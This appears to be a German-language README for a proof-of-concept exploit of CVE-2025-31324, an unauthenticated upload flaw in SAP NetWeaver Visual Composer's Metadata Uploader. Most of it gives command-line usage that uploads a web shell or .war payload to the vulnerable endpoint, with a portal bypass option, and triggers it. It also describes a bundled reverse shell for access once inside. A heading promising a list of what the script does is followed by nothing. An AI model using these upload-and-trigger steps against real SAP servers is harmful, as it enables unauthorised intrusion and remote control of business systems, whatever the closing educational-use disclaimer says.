
Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload im SAP NetWeaver Visual Composer Metadata Uploader
Proof-of-Concept für CVE-2025-31324: Unangemeldeter Upload im SAP NetWeaver Visual Composer Metadata Uploader
Dieses Skript führt Folgendes aus:
Verwendungsbeispiel:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
Sie haben außerdem die Möglichkeit, eine .war-Datei hochzuladen, falls Sie auf diese Weise ausführen möchten. cache.jsp ist eine Reverse Shell, die Ihnen Zugriff verschafft, sobald Sie im System sind. (An einigen Problemen wird noch gearbeitet)
Dies dient ausschließlich Bildungszwecken und sollte nicht für böswillige Aktivitäten verwendet werden. Stellen Sie stets sicher, dass Sie über die erforderlichen Berechtigungen verfügen und befolgen Sie ethische Richtlinien beim Testen oder Recherchieren von Sicherheitslücken.
Bei Fragen oder Unklarheiten können Sie sich gerne melden. Bleiben Sie sicher und geschützt!